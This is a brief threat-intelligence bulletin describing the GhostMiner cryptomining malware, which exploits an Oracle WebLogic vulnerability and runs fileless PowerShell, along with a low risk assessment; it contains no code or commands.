New GhostMiner cryptominer displays unusual attributes
Target: Systems using unpatched versions of Oracle WebLogic server
Attack Vector: Exploitation of CVE-2017-10271 before running fileless operations
Summary: A new strain of cryptocurrency-mining malware has been observed over the last week, with researchers discovering GhostMiner software. The malware exploits a vulnerability on Oracle WebLogic servers to initially access a target system. This distinctive tool is also able to carry out Fileless execution utilising PowerShell code. It also scans to see if any other minors are running on a host before terminating their processes. Notably, the exploit has not amassed a high amount of income through its operations, meaning perhaps the threat actor’s aims are not financial.
Risk assessment summary: The threat is assessed as 4b LOW. This is not the first time Oracle WebLogic servers have been observed to be susceptible to an exploit. We are only in March and already multiple campaigns have been found to be exploiting this, raising the likelihood of further attacks. As well as this, this malware shows signs of being some kind of test, preparing the ground for future attacks, indicating we are likely to see further instances of it.